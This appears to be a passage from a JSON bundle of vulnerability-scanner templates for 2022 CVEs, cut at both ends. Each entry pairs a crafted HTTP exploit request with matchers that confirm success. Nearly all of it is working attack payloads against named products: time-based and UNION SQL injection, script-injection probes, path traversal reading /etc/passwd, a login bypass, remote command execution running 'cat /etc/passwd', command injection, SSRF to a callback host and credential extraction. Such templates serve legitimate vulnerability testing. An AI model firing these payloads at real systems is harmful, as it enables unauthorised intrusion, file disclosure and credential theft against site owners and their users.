Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0693","info":{"name":"WordPress Master Elements <=8.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Post Meta Setting Deleted Successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-0349","info":{"name":"WordPress NotificationX <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnx_id=sleep(6) -- x\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"data\\\":{\\\"success\\\":true}\")"],"condition":"and"}]}]},{"id":"CVE-2022-41473","info":{"name":"RPCMS 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","rpcms"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37153","info":{"name":"Artica Proxy 4.30.000000 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /fw.login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"admin\"><script>alert(document.domain)</script>","Artica Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0784","info":{"name":"WordPress Title Experiments Free <9.0.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"images\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-1883","info":{"name":"Terraboard <2.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["\"page\":","\"results\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2290","info":{"name":"Trilium <0.52.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No handler matched for custom <img src=x onerror=alert(document.domain)>","Note '<img src=x onerror=alert(document.domain)>' not found"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-31268","info":{"name":"Gitblit 1.9.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources//../WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com","gitblit.properties"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2863","info":{"name":"WordPress WPvivid Backup <0.9.76 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=WPvivid HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"_ajax_nonce\":\"([0-9a-z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-44949","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"cookie-reuse":true,"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2462","info":{"name":"WordPress Transposh <=1.0.8.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=tp_history&token=&lang=en","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(transposh) > 0"]},{"type":"word","part":"body","words":["translated","translated_by","timestamp","source","user_login"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35416","info":{"name":"H3C SSL VPN <=2022-07-10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wnm/login/login.json HTTP/1.1\nHost: {{Hostname}}\nCookie: svpnlang=<script>alert('document.domain')</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('document.domain')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31976","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_request HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-47945","info":{"name":"Thinkphp Lang - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?lang=../../thinkphp/base","{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Call Stack","class=\"trace"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-32094","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/doctor/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Doctor  | Dashboard</title>","View Appointment History"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4306","info":{"name":"WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"panda-repeater-add-new\")"],"condition":"and"}]}]},{"id":"CVE-2022-24899","info":{"name":"Contao <4.13.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","\"Not authenticated\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-34121","info":{"name":"CuppaCMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32007","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_email={{username}}&user_pass={{password}}&btnLogin=\n","GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-25082","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/downloadFlile.cgi?payload={{cmd}} HTTP/1.1\nHost: {{Hostname}}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42095","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save\n","POST /?q={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_5 == 200","contains(header_5, 'text/html')","contains(body_5, \"<img src=\\\"x\\\" onerror=\\\"alert(document.domain)\\\" />\")","contains(body_5, 'Backdrop CMS')"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-21661","info":{"name":"WordPress <5.8.3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ecsload&query={\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"\"]}}}&ecs_ajax_settings={\"post_id\":\"1\", \"current_page\":1, \"widget_id\":1, \"theme_id\":1, \"max_num_pages\":10}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"WordPress database error:\")","contains(body, \"error in your SQL syntax\")"],"condition":"and"}]}]},{"id":"CVE-2022-33901","info":{"name":"WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4447","info":{"name":"WordPress Fontsy <=1.8.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{{md5(num)}}\")"],"condition":"and"}]}]},{"id":"CVE-2022-37190","info":{"name":"Cuppa CMS v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\naction=system&function=exec&cmd=cat+/etc/passwd\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","regex":["postgres:.*:1001:","root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-0773","info":{"name":"Documentor <= 1.5.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=doc_search_results&term=&docid=1+AND+(SELECT+6288+FROM+(SELECT(SLEEP(6)))HRaz)\n","GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(content_type_1, \"text/html\")","contains(body_1, \"([])\") && contains(body_2, \".documentor-help\")"],"condition":"and"}]}]},{"id":"CVE-2022-3908","info":{"name":"WordPress Helloprint <1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=language-translate.php&success=added\"><script>alert(`XSS`)<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Translation added\\\\\\\"><script>alert(`XSS`)</script> successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-31984","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42749","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-4897","info":{"name":"WordPress BackupBuddy <8.8.3 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"onload=alert(document.domain)\")","contains(body_2, \"BackupBudddy iFrame\")"],"condition":"and"}]}]},{"id":"CVE-2022-26148","info":{"name":"Grafana & Zabbix Integration - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redirect=%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zabbix\":","\"zbx\":","alexanderzobnin-zabbix-datasource"],"condition":"or"},{"type":"regex","part":"body","regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\"","\"url\":\"([a-z:/0-9.]+)\\/api_jsonrpc\\.php"]}]}]},{"id":"CVE-2022-0735","info":{"name":"GitLab CE/EE - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe","a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-31981","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Control Teams\")"],"condition":"and"}]}]},{"id":"CVE-2022-25323","info":{"name":"ZEROF Web Server 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["back<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2022-1398","info":{"name":"External Media without Import <=1.1.2 - Authenticated Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/upload.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_2","words":["external-media-without-import"]}]}]},{"id":"CVE-2022-24266","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; 